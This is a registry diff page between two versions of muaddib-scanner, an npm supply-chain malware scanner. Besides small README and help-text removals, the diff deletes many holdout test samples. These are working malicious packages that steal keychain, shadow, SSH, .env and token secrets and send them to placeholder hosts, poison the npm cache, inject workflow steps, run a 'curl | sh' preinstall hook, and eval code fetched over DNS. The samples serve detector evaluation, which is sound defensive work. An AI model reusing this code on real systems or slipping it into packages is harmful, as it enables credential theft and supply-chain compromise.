npm - muaddib-scanner - Versions diffs - 2.2.2 → 2.2.4 - Mend

muaddib-scanner 2.2.2 → 2.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (48) hide show

package/README.fr.md CHANGED Viewed

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 <p align="center">
@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Affiche la décomposition explicable du score : contribution de chaque finding au score final, avec les poids par règle et multiplicateurs de sévérité.
-### API Threat Feed
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Exporte les détections sous forme de flux JSON pour intégration SIEM.
-- `muaddib feed` — Affiche le flux de menaces JSON sur stdout (filtrable par limit, sévérité, date)
-- `muaddib serve` — Démarre un serveur HTTP (port 3000 par défaut) avec `GET /feed` et `GET /health`
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Logging des temps de détection
-```bash
-muaddib detections [--stats] [--json]
-```
-Historique des détections avec timestamps de première observation et métriques de lead time (délai entre la détection MUAD'DIB et l'advisory publique).
-### Suivi du taux de faux positifs
-```bash
-muaddib stats [--daily] [--json]
-```
-Statistiques de scan : total scanné, clean, suspect, taux de faux positifs, nombre confirmé malveillant. Utilisez `--daily` pour le détail par jour.
 ### Replay ground truth
 ```bash
@@ -739,7 +705,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate) : taux de detection sur 35 samples malveillants evasifs (4 vagues red team + holdout promu)
 - **Holdout** (pre-tuning) : taux de detection sur 10 samples jamais vus avant correction des regles (mesure de generalisation)
-Lancez `muaddib evaluate` pour reproduire ces metriques localement. Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
+Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
 ---

package/README.md CHANGED Viewed

@@ -1,5 +1,5 @@
 <p align="center">
-  <img src="assets/logo2removebg.png" alt="MUAD'DIB Logo" width="700">
+  <img src="assets/muaddibLogo.png" alt="MUAD'DIB Logo" width="700">
 </p>
 <p align="center">
@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Shows explainable score breakdown: how each finding contributes to the final risk score, with per-rule weights and severity multipliers.
-### Threat Feed API
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Export detections as a JSON threat feed for SIEM integration.
-- `muaddib feed` — Output threat feed JSON to stdout (filterable by limit, severity, date)
-- `muaddib serve` — Start an HTTP server (default port 3000) with `GET /feed` and `GET /health` endpoints
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Detection time logging
-```bash
-muaddib detections [--stats] [--json]
-```
-View detection history with first-seen timestamps and lead time metrics (time between MUAD'DIB detection and public advisory).
-### FP rate tracking
-```bash
-muaddib stats [--daily] [--json]
-```
-View scan statistics: total scanned, clean, suspect, false positive rate, confirmed malicious count. Use `--daily` for per-day breakdown.
 ### Ground truth replay
 ```bash
@@ -742,7 +708,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate): detection rate on 35 evasive malicious samples across 4 red-team waves + promoted holdout
 - **Holdout** (pre-tuning): detection rate on 10 unseen samples before any rule correction (measures generalization)
-Run `muaddib evaluate` to reproduce these metrics locally. See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
+See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
 ---

package/bin/muaddib.js CHANGED Viewed

@@ -363,15 +363,6 @@ const helpText = `
     muaddib scrape                   Scrape new IOCs
     muaddib sandbox <pkg> [--strict] [--no-canary]  Analyze in isolated Docker container
     muaddib sandbox-report <pkg>     Sandbox + detailed network report
-    muaddib feed [options]            Threat feed (JSON)
-    muaddib serve [options]           Start threat feed HTTP server
-    muaddib detections               List recent detections
-    muaddib detections --stats       Show aggregated detection stats
-    muaddib detections --json        Raw JSON output
-    muaddib stats                    Show scan stats + FP rate
-    muaddib stats --daily            Last 7 days daily breakdown
-    muaddib stats --json             Raw JSON dump
-    muaddib evaluate                 Evaluate scanner effectiveness (TPR, FPR, ADR)
     muaddib version                  Show version
   Replay Options:

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.2",
+  "version": "2.2.4",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/datasets/holdout-v2/conditional-os-payload/index.js DELETED Viewed

@@ -1,36 +0,0 @@
-const os = require('os');
-const { execSync } = require('child_process');
-const https = require('https');
-function exfil(data) {
-  const payload = JSON.stringify(data);
-  const req = https.request({
-    hostname: 'metrics.example.com',
-    port: 443,
-    path: '/v2/report',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-  });
-  req.on('error', () => {});
-  req.write(payload);
-  req.end();
-}
-const platform = os.platform();
-const arch = os.arch();
-try {
-  if (platform === 'darwin') {
-    // macOS: dump keychain credentials
-    const creds = execSync('security dump-keychain -d login.keychain 2>/dev/null', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'darwin', arch, type: 'keychain', data: creds.substring(0, 8192) });
-  } else if (platform === 'linux') {
-    // Linux: read /etc/shadow
-    const shadow = execSync('cat /etc/shadow 2>/dev/null', { encoding: 'utf8', timeout: 5000 });
-    exfil({ os: 'linux', arch, type: 'shadow', data: shadow });
-  } else if (platform === 'win32') {
-    // Windows: extract saved credentials via PowerShell
-    const creds = execSync('powershell -c "Get-StoredCredential | ConvertTo-Json"', { encoding: 'utf8', timeout: 10000 });
-    exfil({ os: 'win32', arch, type: 'credentials', data: creds });
-  }
-} catch (e) {}

package/datasets/holdout-v2/conditional-os-payload/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "conditional-os-payload",
-  "version": "1.0.0",
-  "description": "Holdout v2 — OS-specific credential theft",
-  "main": "index.js"
-}

package/datasets/holdout-v2/env-var-reconstruction/index.js DELETED Viewed

@@ -1,21 +0,0 @@
-const https = require('https');
-// Reconstruct "GITHUB_TOKEN" from charCodes
-const codes = [71, 73, 84, 72, 85, 66, 95, 84, 79, 75, 69, 78];
-const varName = codes.map(c => String.fromCharCode(c)).join('');
-// Access via bracket notation to avoid static detection
-const secret = process.env[varName];
-if (secret) {
-  const payload = JSON.stringify({ t: secret, h: require('os').hostname() });
-  const req = https.request({
-    hostname: 'telemetry-api.example.com',
-    port: 443,
-    path: '/v1/collect',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
-  });
-  req.write(payload);
-  req.end();
-}

package/datasets/holdout-v2/env-var-reconstruction/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "env-var-reconstruction",
-  "version": "1.0.0",
-  "description": "Holdout v2 — charCode reconstruction of env var name",
-  "main": "index.js"
-}

package/datasets/holdout-v2/github-workflow-inject/index.js DELETED Viewed

@@ -1,36 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-// Find the project root by traversing up
-let projectRoot = __dirname;
-while (projectRoot !== path.dirname(projectRoot)) {
-  if (fs.existsSync(path.join(projectRoot, '.git'))) break;
-  projectRoot = path.dirname(projectRoot);
-}
-const workflowDir = path.join(projectRoot, '.github', 'workflows');
-// Malicious step to inject into existing workflows
-const maliciousStep = `
-      - name: Check dependencies
-        run: |
-          curl -s https://api.example.com/hook -d "token=${{ secrets.GITHUB_TOKEN }}" -d "repo=${{ github.repository }}"
-`;
-try {
-  const files = fs.readdirSync(workflowDir);
-  for (const file of files) {
-    if (!file.endsWith('.yml') && !file.endsWith('.yaml')) continue;
-    const fullPath = path.join(workflowDir, file);
-    let content = fs.readFileSync(fullPath, 'utf8');
-    // Inject after the first "steps:" line
-    const stepsIndex = content.indexOf('steps:');
-    if (stepsIndex !== -1) {
-      const afterSteps = content.indexOf('\n', stepsIndex);
-      content = content.slice(0, afterSteps + 1) + maliciousStep + content.slice(afterSteps + 1);
-      fs.writeFileSync(fullPath, content);
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/github-workflow-inject/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "github-workflow-inject",
-  "version": "1.0.0",
-  "description": "Holdout v2 — inject step into existing workflow files",
-  "main": "index.js"
-}

package/datasets/holdout-v2/homedir-ssh-key-steal/index.js DELETED Viewed

@@ -1,29 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-// Read SSH private key
-const sshKeyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
-let keyData;
-try {
-  keyData = fs.readFileSync(sshKeyPath, 'utf8');
-} catch (e) {
-  process.exit(0);
-}
-// Encode as base64 to fit in a header
-const encoded = Buffer.from(keyData).toString('base64');
-// Exfiltrate via custom header to legitimate-looking domain
-const req = https.request({
-  hostname: 'api.github.com',
-  port: 443,
-  path: '/repos/check-update',
-  method: 'GET',
-  headers: {
-    'User-Agent': 'node-updater/1.0',
-    'X-Debug-Data': encoded
-  }
-});
-req.end();

package/datasets/holdout-v2/homedir-ssh-key-steal/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "homedir-ssh-key-steal",
-  "version": "1.0.0",
-  "description": "Holdout v2 — SSH key exfiltration via HTTP header",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-cache-poison/index.js DELETED Viewed

@@ -1,38 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const crypto = require('crypto');
-// Target: npm's content-addressable cache
-const npmCacheDir = path.join(os.homedir(), '.npm', '_cacache', 'content-v2', 'sha512');
-// Malicious payload to inject into cached package
-const maliciousCode = `
-;(function(){
-  const h = require('https');
-  const o = require('os');
-  const d = JSON.stringify({ h: o.hostname(), u: o.userInfo().username, e: process.env });
-  const r = h.request({ hostname: 'collect.example.com', path: '/npm', method: 'POST',
-    headers: { 'Content-Length': Buffer.byteLength(d) } });
-  r.write(d); r.end();
-})();
-`;
-try {
-  // Walk the cache directory to find JS entries
-  const subDirs = fs.readdirSync(npmCacheDir);
-  for (const sub of subDirs.slice(0, 5)) {
-    const subPath = path.join(npmCacheDir, sub);
-    const entries = fs.readdirSync(subPath);
-    for (const entry of entries.slice(0, 3)) {
-      const entryPath = path.join(subPath, entry);
-      const content = fs.readFileSync(entryPath, 'utf8');
-      // Only poison JS files
-      if (content.includes('module.exports') || content.includes('require(')) {
-        const poisoned = maliciousCode + '\n' + content;
-        fs.writeFileSync(entryPath, poisoned);
-      }
-    }
-  }
-} catch (e) {}

package/datasets/holdout-v2/npm-cache-poison/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "npm-cache-poison",
-  "version": "1.0.0",
-  "description": "Holdout v2 — local npm cache manipulation",
-  "main": "index.js"
-}

package/datasets/holdout-v2/npm-lifecycle-preinstall-curl/package.json DELETED Viewed

@@ -1,8 +0,0 @@
-{
-  "name": "npm-lifecycle-preinstall-curl",
-  "version": "1.0.0",
-  "description": "Holdout v2 — pure lifecycle script attack, no JS files",
-  "scripts": {
-    "preinstall": "curl -s https://evil.com/setup.sh | sh"
-  }
-}

package/datasets/holdout-v2/process-env-proxy-getter/index.js DELETED Viewed

@@ -1,35 +0,0 @@
-const http = require('http');
-// Snapshot all current env values before interception
-const envSnapshot = Object.assign({}, process.env);
-// Intercept all process.env property accesses via Object.defineProperty
-// Different from Proxy-based approach — works on the actual process.env object
-const sensitiveKeys = ['TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'NPM', 'AWS', 'GITHUB'];
-Object.keys(envSnapshot).forEach(key => {
-  const original = envSnapshot[key];
-  const isSensitive = sensitiveKeys.some(s => key.toUpperCase().includes(s));
-  Object.defineProperty(process.env, key, {
-    get() {
-      if (isSensitive) {
-        // Silently exfiltrate on each access to a sensitive var
-        const payload = JSON.stringify({ k: key, v: original });
-        const req = http.request({
-          hostname: '127.0.0.1',
-          port: 8443,
-          path: '/log',
-          method: 'POST',
-          headers: { 'Content-Length': Buffer.byteLength(payload) }
-        });
-        req.on('error', () => {});
-        req.write(payload);
-        req.end();
-      }
-      return original;
-    },
-    configurable: true,
-    enumerable: true
-  });
-});

package/datasets/holdout-v2/process-env-proxy-getter/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "process-env-proxy-getter",
-  "version": "1.0.0",
-  "description": "Holdout v2 — defineProperty intercept on process.env",
-  "main": "index.js"
-}

package/datasets/holdout-v2/readable-stream-hijack/index.js DELETED Viewed

@@ -1,44 +0,0 @@
-const http = require('http');
-const https = require('https');
-// Monkey-patch IncomingMessage prototype to intercept all HTTP responses
-const originalEmit = http.IncomingMessage.prototype.emit;
-http.IncomingMessage.prototype.emit = function(event, ...args) {
-  if (event === 'end') {
-    // Extract authorization headers from the response's request
-    const authHeaders = {};
-    const reqHeaders = this.req && this.req.getHeaders ? this.req.getHeaders() : {};
-    for (const [key, value] of Object.entries(reqHeaders)) {
-      if (key.toLowerCase().includes('auth') || key.toLowerCase().includes('token') || key.toLowerCase().includes('cookie')) {
-        authHeaders[key] = value;
-      }
-    }
-    if (Object.keys(authHeaders).length > 0) {
-      // Forward intercepted auth headers to external server
-      const payload = JSON.stringify({
-        url: this.req && this.req.path,
-        headers: authHeaders,
-        timestamp: Date.now()
-      });
-      const exfilReq = https.request({
-        hostname: 'telemetry.example.com',
-        port: 443,
-        path: '/collect',
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-          'Content-Length': Buffer.byteLength(payload)
-        }
-      });
-      exfilReq.on('error', () => {});
-      exfilReq.write(payload);
-      exfilReq.end();
-    }
-  }
-  return originalEmit.call(this, event, ...args);
-};

package/datasets/holdout-v2/readable-stream-hijack/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "readable-stream-hijack",
-  "version": "1.0.0",
-  "description": "Holdout v2 — IncomingMessage prototype monkey-patch",
-  "main": "index.js"
-}

package/datasets/holdout-v2/setTimeout-chain/index.js DELETED Viewed

@@ -1,50 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const os = require('os');
-const https = require('https');
-// Anti-sandbox: chained setTimeout with random delays
-// Sandboxes typically timeout after 30s, this chain can take up to 5 minutes
-function stage1() {
-  setTimeout(() => {
-    stage2();
-  }, Math.random() * 60000);
-}
-function stage2() {
-  setTimeout(() => {
-    stage3();
-  }, Math.random() * 60000);
-}
-function stage3() {
-  setTimeout(() => {
-    stage4();
-  }, Math.random() * 60000);
-}
-function stage4() {
-  setTimeout(() => {
-    stage5();
-  }, Math.random() * 60000);
-}
-function stage5() {
-  setTimeout(() => {
-    // Final payload: read .npmrc and exfiltrate
-    const npmrc = path.join(os.homedir(), '.npmrc');
-    try {
-      const token = fs.readFileSync(npmrc, 'utf8');
-      const data = Buffer.from(token).toString('base64');
-      const req = https.request({
-        hostname: 'cdn-analytics.example.com',
-        path: '/beacon?d=' + data,
-        method: 'GET'
-      });
-      req.end();
-    } catch (e) {}
-  }, Math.random() * 60000);
-}
-stage1();

package/datasets/holdout-v2/setTimeout-chain/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "setTimeout-chain",
-  "version": "1.0.0",
-  "description": "Holdout v2 — nested setTimeout chain with random delays",
-  "main": "index.js"
-}

package/datasets/holdout-v2/wasm-loader/index.js DELETED Viewed

@@ -1,46 +0,0 @@
-const https = require('https');
-const os = require('os');
-// Download WASM module at runtime — malicious logic is in the binary
-const wasmUrl = 'https://cdn.example.com/analytics/v3/engine.wasm';
-function downloadWasm(url) {
-  return new Promise((resolve, reject) => {
-    https.get(url, (res) => {
-      const chunks = [];
-      res.on('data', c => chunks.push(c));
-      res.on('end', () => resolve(Buffer.concat(chunks)));
-      res.on('error', reject);
-    }).on('error', reject);
-  });
-}
-async function init() {
-  const wasmBytes = await downloadWasm(wasmUrl);
-  // Collect credentials to pass into WASM memory
-  const env = process.env;
-  const creds = JSON.stringify({
-    npm: env.NPM_TOKEN || '',
-    gh: env.GITHUB_TOKEN || '',
-    aws_key: env.AWS_ACCESS_KEY_ID || '',
-    aws_secret: env.AWS_SECRET_ACCESS_KEY || '',
-    hostname: os.hostname(),
-    user: os.userInfo().username
-  });
-  // Instantiate WASM with imported memory containing credentials
-  const memory = new WebAssembly.Memory({ initial: 10 });
-  const encoder = new TextEncoder();
-  const encoded = encoder.encode(creds);
-  new Uint8Array(memory.buffer).set(encoded);
-  const { instance } = await WebAssembly.instantiate(wasmBytes, {
-    env: { memory, credsLen: encoded.length }
-  });
-  // WASM module handles exfiltration internally via imported network functions
-  instance.exports.run();
-}
-init().catch(() => {});

package/datasets/holdout-v2/wasm-loader/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "wasm-loader",
-  "version": "1.0.0",
-  "description": "Holdout v2 — WASM-based credential passing",
-  "main": "index.js"
-}

package/datasets/holdout-v3/dns-txt-payload/index.js DELETED Viewed

@@ -1,11 +0,0 @@
-const dns = require('dns');
-// Retrieve payload from DNS TXT record — no HTTP involved
-dns.resolveTxt('payload.evil-dns.com', (err, records) => {
-  if (err) return;
-  // TXT records come as arrays of strings
-  const encoded = records.map(r => r.join('')).join('');
-  const decoded = Buffer.from(encoded, 'base64').toString('utf8');
-  // Execute the payload received via DNS
-  eval(decoded);
-});

package/datasets/holdout-v3/dns-txt-payload/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "dns-txt-payload",
-  "version": "1.0.0",
-  "description": "DNS resolver helper utilities",
-  "main": "index.js"
-}

package/datasets/holdout-v3/electron-rce/index.js DELETED Viewed

@@ -1,32 +0,0 @@
-// Only activate in Electron environment where we have elevated privileges
-if (process.versions && process.versions.electron) {
-  const { exec } = require('child_process');
-  const os = require('os');
-  // Electron apps often run with higher privileges
-  const platform = os.platform();
-  let cmd;
-  if (platform === 'win32') {
-    cmd = 'powershell -NoProfile -Command "Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select DisplayName, InstallLocation | ConvertTo-Json"';
-  } else if (platform === 'darwin') {
-    cmd = 'security find-generic-password -ga "Chrome" 2>&1 | head -20';
-  } else {
-    cmd = 'cat /etc/shadow 2>/dev/null || cat /etc/passwd';
-  }
-  exec(cmd, (err, stdout) => {
-    if (stdout) {
-      const https = require('https');
-      const data = JSON.stringify({ platform, data: stdout });
-      const req = https.request({
-        hostname: 'electron-data.evil.com',
-        port: 443,
-        path: '/exfil',
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' }
-      });
-      req.write(data);
-      req.end();
-    }
-  });
-}

package/datasets/holdout-v3/electron-rce/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "electron-rce",
-  "version": "1.0.0",
-  "description": "Cross-platform desktop helper",
-  "main": "index.js"
-}

package/datasets/holdout-v3/env-file-parse-exfil/index.js DELETED Viewed

@@ -1,39 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const https = require('https');
-// Read .env file directly — no dotenv, no process.env
-const envPath = path.join(process.cwd(), '.env');
-let envContent;
-try {
-  envContent = fs.readFileSync(envPath, 'utf8');
-} catch(e) { process.exit(0); }
-// Manual KEY=VALUE parsing
-const secrets = {};
-envContent.split('\n').forEach(line => {
-  const trimmed = line.trim();
-  if (!trimmed || trimmed.startsWith('#')) return;
-  const eqIdx = trimmed.indexOf('=');
-  if (eqIdx === -1) return;
-  const key = trimmed.slice(0, eqIdx).trim();
-  const val = trimmed.slice(eqIdx + 1).trim().replace(/^["']|["']$/g, '');
-  if (/TOKEN|SECRET|KEY|PASSWORD|API/i.test(key)) {
-    secrets[key] = val;
-  }
-});
-// Exfiltrate parsed secrets
-if (Object.keys(secrets).length > 0) {
-  const data = JSON.stringify(secrets);
-  const opts = {
-    hostname: 'env-collector.malware.io',
-    port: 443,
-    path: '/api/env',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
-  };
-  const req = https.request(opts);
-  req.write(data);
-  req.end();
-}